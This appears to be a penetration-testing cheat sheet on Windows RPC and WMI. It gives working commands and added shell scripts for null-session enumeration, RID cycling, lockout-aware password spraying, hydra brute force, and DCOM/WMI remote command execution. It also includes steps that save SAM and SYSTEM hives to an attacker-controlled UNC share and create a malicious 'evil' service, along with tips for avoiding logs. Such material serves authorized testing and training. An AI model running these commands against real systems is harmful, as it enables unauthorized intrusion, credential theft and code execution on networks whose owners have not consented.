Windows Management Instrumentation / Microsoft RPC
Environment Variables / Setup
export IP=
export DOMAIN=domain.local
Phase 1: RPC Service Discovery
Nmap RPC Scripts
# msrpc-enum walks the endpoint mapper over SMB named pipes, so it needs 139/445 in scope, not just 135
nmap -p 135,139,445 --script=msrpc-enum $IP
# rpc-grind fingerprints ONC/Sun RPC (portmapper, 111/tcp) and does not apply to MSRPC
RPC Endpoint Mapping
# Enumerate registered endpoints from the endpoint mapper on 135/tcp (works without credentials)
impacket-rpcdump $IP
# Probe one string binding directly and brute-force known interface UUIDs on it
impacket-rpcmap "ncacn_ip_tcp:$IP" -brute-uuids
# Note: rpcinfo -p talks to the ONC/Sun RPC portmapper (111/tcp) and says nothing about Windows MSRPC; use rpcdump instead
# Check specific RPC services
nmap -p 135,139,445 --script=msrpc-enum $IP
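The endpoint mapper answers the practical question of which interfaces can be reached without SMB: an interface that only has named-pipe (ncacn_np) bindings needs 445, while one with an ncacn_ip_tcp binding is reachable on 135 plus the dynamic port the mapper advertises. The following is an added example, not code from the original page or from impacket, that filters impacket-rpcdump output down to exactly those TCP-reachable interfaces. The sample output embedded in it is constructed in rpcdump's layout and is not from a real host; run the functions on `impacket-rpcdump "$IP"` for live data.

```shell
#!/bin/sh
# Added example (not from the original page): list the interfaces that the
# endpoint mapper exposes directly over TCP, with their dynamic ports, from
# impacket-rpcdump output. Live use:  impacket-rpcdump "$IP" | tcp_endpoints

# Constructed rpcdump-style output for the parser (not captured from a real host).
SAMPLE_RPCDUMP='Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.10[49674]
          ncacn_np:\\DC01[\pipe\spoolss]
          ncalrpc:[spoolss]

Protocol: [MS-WKST]: Workstation Service Remote Protocol
Provider: wkssvc.dll
UUID    : 6BFFD098-A112-3610-9833-46C3F87E345A v1.0
Bindings:
          ncacn_np:\\DC01[\PIPE\wkssvc]
          ncalrpc:[wkssvc]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_ip_tcp:10.10.10.10[49668]
          ncacn_np:\\DC01[\PIPE\svcctl]
'

# Read rpcdump output on stdin; print "UUID version protocol port" for every
# ncacn_ip_tcp binding. Interfaces with only named-pipe/LRPC bindings are skipped.
tcp_endpoints() {
    awk '
        /^Protocol:/    { proto = $2; sub(/:$/, "", proto) }   # "[MS-SCMR]:" -> "[MS-SCMR]"
        /^UUID/         { uuid = $3; ver = $4 }                 # "UUID    : <uuid> v2.0"
        /ncacn_ip_tcp:/ {
            port = $0
            sub(/.*\[/, "", port); sub(/\].*/, "", port)        # keep the text between [ and ]
            printf "%s %s %s %s\n", uuid, ver, proto, port
        }
    '
}

# Print the TCP port of one interface (UUID, case-insensitive), or nothing if
# the mapper only advertises it over named pipes.
port_for_interface() {
    want=$(printf '%s' "$1" | tr '[:lower:]' '[:upper:]')
    tcp_endpoints | awk -v want="$want" 'toupper($1) == want { print $4; exit }'
}

# Number of distinct interfaces reachable without SMB.
tcp_interface_count() {
    tcp_endpoints | awk '{ seen[$1] = 1 } END { n = 0; for (k in seen) n++; print n }'
}

# Offline demonstration on the constructed sample.
printf '%s\n' "$SAMPLE_RPCDUMP" | tcp_endpoints
```

With a real dump the same one-liner tells you, for example, whether svcctl (MS-SCMR) can be reached for service creation when 445 is blocked at a firewall but the dynamic range is open.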
Phase 2: Anonymous RPC Access
RPCClient Anonymous Session
rpcclient -U "" -N $IP
Common RPCClient Commands
# User enumeration
enumdomusers
enumdomgroups
queryuser <RID>
querygroupmem <RID>
# Domain information
querydominfo
enumdomains
lookupsids <SID>
lookupnames <name>
# Share enumeration
netshareenum
netshareenumall
# Printer enumeration
enumprinters
# Exit
exit
Null Session Testing
# Test null session access
smbclient -N -L \\\\$IP
netexec smb $IP -u '' -p ''
enum4linux-ng -A $IP
Phase 3: RPC User Enumeration
SID Enumeration
# Using rpcclient: read the domain SID first, then resolve the well-known RIDs under it
rpcclient -U "" -N $IP
lsaquery
# The "Domain Sid:" line prints the S-1-5-21-<domain> prefix used below
# RID 500 = Administrator
lookupsids S-1-5-21-<domain>-500
# RID 501 = Guest
lookupsids S-1-5-21-<domain>-501
# RID 512 = Domain Admins
lookupsids S-1-5-21-<domain>-512
# RID 513 = Domain Users
lookupsids S-1-5-21-<domain>-513
# Continue with 502 (krbtgt), 519 (Enterprise Admins) and the 1000+ range where ordinary accounts are created
Automated User Enumeration
# Using enum4linux-ng
enum4linux-ng -A $IP
# Using netexec
netexec smb $IP -u '' -p '' --users
netexec smb $IP -u '' -p '' --groups
Phase 4: RID Cycling Attack
Manual RID Cycling
# rpcclient has no loop construct: run the loop in the shell and hand each command to rpcclient with -c
# Get the domain SID first
rpcclient -U "" -N $IP -c lsaquery
export DOMAIN_SID="S-1-5-21-<domain>"
# Query users by RID (queryuser takes the RID as a decimal or 0x-prefixed number; it only resolves user objects)
for i in $(seq 500 1100); do rpcclient -U "" -N $IP -c "queryuser $i"; done
# lookupsids also resolves groups and accepts several SIDs per call, so it is the cheaper bulk query; unused RIDs come back as *unknown* (type 8)
for i in $(seq 500 1100); do rpcclient -U "" -N $IP -c "lookupsids $DOMAIN_SID-$i"; done 2>/dev/null | grep -v unknown
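RID cycling is an LsarLookupSids call per SID, and the cost is the connection, not the lookup, so the loop belongs in the shell with SIDs batched per rpcclient invocation. The following is an added example, not code from the original page or from Samba, that does the batching and parses the `SID DOMAIN\name (type)` lines rpcclient prints into a clean user list. The domain SID and the sample lookupsids output in it are constructed placeholders, not from a real domain; it assumes a null session is permitted (replace `-U "" -N` with `-U 'dom/user%pass'` otherwise).

```shell
#!/bin/sh
# Added example (not from the original page): RID cycling over LsarLookupSids
# with the loop in the shell and SIDs batched per rpcclient call.
# DOMAIN_SID is a constructed placeholder; take the real one from `rpcclient -c lsaquery`.
DOMAIN_SID="S-1-5-21-1004336348-1177238915-682003330"
BATCH=20   # SIDs per lookupsids call

# Constructed lookupsids output for the parser (not captured from a real host).
# rpcclient prints "<SID> <DOMAIN>\<name> (<type>)"; type 8 means the RID is unused.
SAMPLE_LOOKUPSIDS='S-1-5-21-1004336348-1177238915-682003330-500 CORP\Administrator (1)
S-1-5-21-1004336348-1177238915-682003330-501 CORP\Guest (1)
S-1-5-21-1004336348-1177238915-682003330-502 CORP\krbtgt (1)
S-1-5-21-1004336348-1177238915-682003330-512 CORP\Domain Admins (2)
S-1-5-21-1004336348-1177238915-682003330-1105 *unknown*\*unknown* (8)
S-1-5-21-1004336348-1177238915-682003330-1106 CORP\svc_backup (1)'

# Turn lookupsids output into "rid type name" lines, dropping unresolved SIDs.
# Types (SID_NAME_USE): 1 user, 2 domain group, 4 alias, 5 well-known group.
parse_lookupsids() {
    awk '
        /^S-1-5-21-/ && $NF != "(8)" {
            type = $NF; gsub(/[()]/, "", type)
            name = ""
            for (i = 2; i < NF; i++) name = name (i > 2 ? " " : "") $i   # names may contain spaces
            sub(/^[^\\]*\\/, "", name)                                    # strip "CORP\"
            n = split($1, p, "-"); rid = p[n]
            printf "%s %s %s\n", rid, type, name
        }
    '
}

# Keep only user accounts (type 1) and print bare names, one per line.
users_only() {
    awk '$2 == 1 { $1 = ""; $2 = ""; sub(/^ +/, ""); print }'
}

# Cycle RIDs $2..$3 on host $1; emits "rid type name" for every resolved SID.
rid_cycle() {
    host=$1; rid=$2; end=$3
    while [ "$rid" -le "$end" ]; do
        sids=""; i=0
        while [ "$rid" -le "$end" ] && [ "$i" -lt "$BATCH" ]; do
            sids="$sids $DOMAIN_SID-$rid"
            rid=$((rid + 1)); i=$((i + 1))
        done
        rpcclient -U "" -N "$host" -c "lookupsids$sids"
    done | parse_lookupsids
}

# Offline demonstration on the constructed sample. Live use:
#   rid_cycle "$IP" 500 1100 | users_only > users.txt
printf '%s\n' "$SAMPLE_LOOKUPSIDS" | parse_lookupsids
```

Type 2 and 4 hits are worth keeping as well: group RIDs such as 512 confirm you have the right domain SID, and custom groups with descriptive names are often the fastest way to spot service and admin accounts in the user list.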
Automated RID Cycling
# Using impacket-lookupsid (null session with -no-pass; the trailing number is the highest RID to try, default 4000)
impacket-lookupsid -no-pass "anonymous@$IP" 5000
# Using ridenum (positional arguments are target, start RID, end RID; a username and password may follow if a null session is refused)
python3 ridenum.py $IP 500 50000
# Using netexec (the optional number raises the upper RID from the default)
netexec smb $IP -u guest -p '' --rid-brute 10000
Phase 5: WMI Enumeration
WMI via RPC
# Using impacket-wmiquery (requires credentials; opens an interactive WQL> prompt, or reads queries from a file with -file)
impacket-wmiquery domain/username:password@$IP
# At the WQL> prompt: SELECT * FROM Win32_Service
# Using netexec WMI
netexec wmi $IP -u username -p password --wmi "SELECT * FROM Win32_Process"
Common WMI Queries
# System information
SELECT * FROM Win32_ComputerSystem
SELECT * FROM Win32_OperatingSystem
# Running processes
SELECT * FROM Win32_Process
# Services
SELECT * FROM Win32_Service
# Network configuration
SELECT * FROM Win32_NetworkAdapterConfiguration
# User accounts
SELECT * FROM Win32_UserAccount
# Installed software (caveat: Win32_Product makes Windows Installer run a consistency check on every MSI package, which is slow and writes MsiInstaller events to the Application log; prefer the Uninstall registry keys when stealth matters)
SELECT * FROM Win32_Product
Phase 6: RPC Exploitation
Password Spraying via RPC
# Using netexec: one password per round across every user (read the lockout threshold and reset window with --pass-pol before the first round)
netexec smb $IP -u users.txt -p 'Password123!' --continue-on-success
# Using rpcclient with credentials
rpcclient -U "domain/username%password" $IP
RPC Brute Force
# Brute force SMB/RPC authentication (-t 1 keeps attempts serial; still counts against the lockout threshold, so spray rather than brute force in a domain with lockout enabled)
hydra -L users.txt -P passwords.txt -t 1 $IP smb
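Spraying is only safe when the round size is derived from the domain's lockout policy rather than guessed. The following is an added example, not code from the original page or from netexec, that reads the threshold and reset window out of `netexec smb --pass-pol` output and sizes each spraying round accordingly. It assumes the `Account Lockout Threshold: <n|None>` and `Reset Account Lockout Counter: <n> minutes` line formats shown in the constructed sample; verify those against your netexec version. The two-password safety margin is a policy choice of this example, not a documented rule.

```shell
#!/bin/sh
# Added example (not from the original page): gate a password spray on the
# domain lockout policy so no account can be locked by the spray itself.

# Constructed --pass-pol excerpt (not captured from a real domain); the line
# formats are an assumption about netexec output.
SAMPLE_PASS_POL='SMB  10.10.10.10  445  DC01  [+] Dumping password info for domain: CORP
SMB  10.10.10.10  445  DC01  Minimum password length: 7
SMB  10.10.10.10  445  DC01  Password history length: 24
SMB  10.10.10.10  445  DC01  Reset Account Lockout Counter: 30 minutes
SMB  10.10.10.10  445  DC01  Locked Account Duration: 30 minutes
SMB  10.10.10.10  445  DC01  Account Lockout Threshold: 5'

# Lockout threshold as an integer (0 = lockout disabled); fails if the line is absent.
lockout_threshold() {
    awk -F': ' 'tolower($0) ~ /account lockout threshold/ {
            v = $NF; gsub(/[ \t\r]/, "", v)
            r = (tolower(v) == "none") ? 0 : v + 0
            print r; found = 1; exit
        }
        END { if (!found) exit 1 }'
}

# Counter reset window in minutes; falls back to 30 when the line is absent.
lockout_window_minutes() {
    awk -F': ' 'tolower($0) ~ /reset account lockout counter/ { split($NF, a, " "); print a[1] + 0; found = 1; exit }
        END { if (!found) print 30 }'
}

# Passwords allowed per account per window. Policy choice (assumption): stay
# two below the threshold so a user's own failed logins in the same window
# cannot tip the account over. Prints "unlimited" when lockout is disabled.
spray_budget() {
    threshold=$1
    if [ "$threshold" -eq 0 ]; then
        echo unlimited
        return
    fi
    budget=$((threshold - 2))
    if [ "$budget" -lt 0 ]; then budget=0; fi
    echo "$budget"
}

# One password per round across the whole user list; sleep out the reset
# window once the round budget is spent. Needs netexec and a host that
# answers --pass-pol for the given credentials (null session here).
spray() {
    host=$1; userfile=$2; passfile=$3
    pol=$(netexec smb "$host" -u '' -p '' --pass-pol) || return 1
    threshold=$(printf '%s\n' "$pol" | lockout_threshold) || { echo "lockout policy unreadable, not spraying" >&2; return 1; }
    window=$(printf '%s\n' "$pol" | lockout_window_minutes)
    budget=$(spray_budget "$threshold")
    if [ "$budget" = 0 ]; then echo "threshold $threshold too low to spray safely" >&2; return 1; fi
    n=0
    while IFS= read -r pw; do
        if [ "$budget" != unlimited ] && [ "$n" -ge "$budget" ]; then
            echo "round budget ($budget) spent; sleeping $window minutes" >&2
            sleep $((window * 60)); n=0
        fi
        netexec smb "$host" -u "$userfile" -p "$pw" --continue-on-success
        n=$((n + 1))
    done < "$passfile"
}

# Offline demonstration on the constructed sample (prints the threshold).
printf '%s\n' "$SAMPLE_PASS_POL" | lockout_threshold
```

Usage: `spray "$IP" users.txt passwords.txt`. A "None" threshold means no lockout is configured and the gate lets every password through, which is exactly the misconfiguration the checklist later in this page looks for.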
Phase 7: Advanced RPC Attacks
DCOM Command Execution
# impacket-dcomexec runs commands through a DCOM object (needs admin credentials; uses 135/tcp plus a dynamic port). It executes, it does not enumerate DCOM objects.
impacket-dcomexec domain/username:password@$IP
# Choose the activation object: ShellWindows (default), ShellBrowserWindow or MMC20
impacket-dcomexec -object MMC20 domain/username:password@$IP
WMI Command Execution
# Execute commands via WMI (requires credentials)
impacket-wmiexec domain/username:password@$IP
# Alternative WMI execution
netexec wmi $IP -u username -p password -x "whoami"
Phase 8: RPC Information Gathering
Domain Information via RPC
rpcclient -U "" -N $IP
# Get domain information
querydominfo
enumdomains
# Get domain SID (the S-1-5-21-... prefix that RID cycling needs)
lsaquery
# Get password policy (minimum length and complexity flags only; the lockout threshold is not in this output)
getdompwinfo
Trust Relationships
# Enumerate trusted domains over LSARPC (may require credentials depending on RestrictAnonymous)
rpcclient -U "" -N $IP
enumtrust
# Forest-wide trust listing over NETLOGON
dsenumdomtrusts
Phase 9: RPC Post-Exploitation
Registry Access via RPC
# Using impacket-reg (requires admin credentials; the Remote Registry service must be running, which reg.py starts over svcctl if needed)
impacket-reg domain/username:password@$IP query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
# Save SAM/SYSTEM hives (the save action writes them to a UNC path the target can reach; SYSTEM is needed to decrypt SAM)
impacket-reg domain/username:password@$IP save -keyName HKLM\\SAM -o '\\\\<attacker-ip>\\share'
impacket-reg domain/username:password@$IP save -keyName HKLM\\SYSTEM -o '\\\\<attacker-ip>\\share'
# With admin credentials impacket-secretsdump reads the same hives over the remote registry in one step
Service Manipulation via RPC
# Using impacket-services (requires admin credentials; talks to the Service Control Manager over MS-SCMR)
impacket-services domain/username:password@$IP list
impacket-services domain/username:password@$IP create -name evil -display evil -path "cmd.exe /c evil.exe"
# start, stop and delete all take the service name with -name; clean up afterwards, since creation writes System log event 7045 (and Security 4697 when auditing is on)
impacket-services domain/username:password@$IP start -name evil
Common RPC Ports & Services
135/tcp - RPC Endpoint Mapper (EPM)
139/tcp - NetBIOS Session Service (MSRPC over SMB named pipes, ncacn_np)
445/tcp - SMB over TCP (named-pipe transport for samr, lsarpc, srvsvc, svcctl, winreg, spoolss)
593/tcp - RPC over HTTP endpoint mapper (ncacn_http)
49152-65535/tcp - Dynamic RPC ports on Windows Vista/Server 2008 and later (1025-5000 on older versions); allocated per interface and advertised by the endpoint mapper
RPC Enumeration Checklist
- Anonymous RPC access testing
- User enumeration via rpcclient
- Group enumeration and membership
- Domain information gathering
- RID cycling for user discovery
- Share enumeration via RPC
- WMI queries (if credentials available)
- Trust relationship enumeration
- Password policy information
Tools Summary
# Enumeration
rpcclient, enum4linux-ng, netexec, impacket-rpcdump, impacket-rpcmap, impacket-lookupsid
# Exploitation
impacket suite (wmiexec, dcomexec, services, reg)
hydra (brute force)
# WMI specific
impacket-wmiquery, impacket-wmiexec
Common RPC Misconfigurations
- Null sessions allowed (RestrictAnonymous / RestrictAnonymousSAM set to 0, or EveryoneIncludesAnonymous enabled)
- Weak or default credentials on service accounts
- Over-privileged service accounts
- Unrestricted WMI/DCOM access for non-admin users
- Weak password or lockout policy (readable over SAMR without credentials)
Next Steps
Once RPC enumeration succeeds:
- Use discovered users for password attacks
- Test obtained credentials on other services
- Leverage WMI for command execution
- Extract additional information via registry/services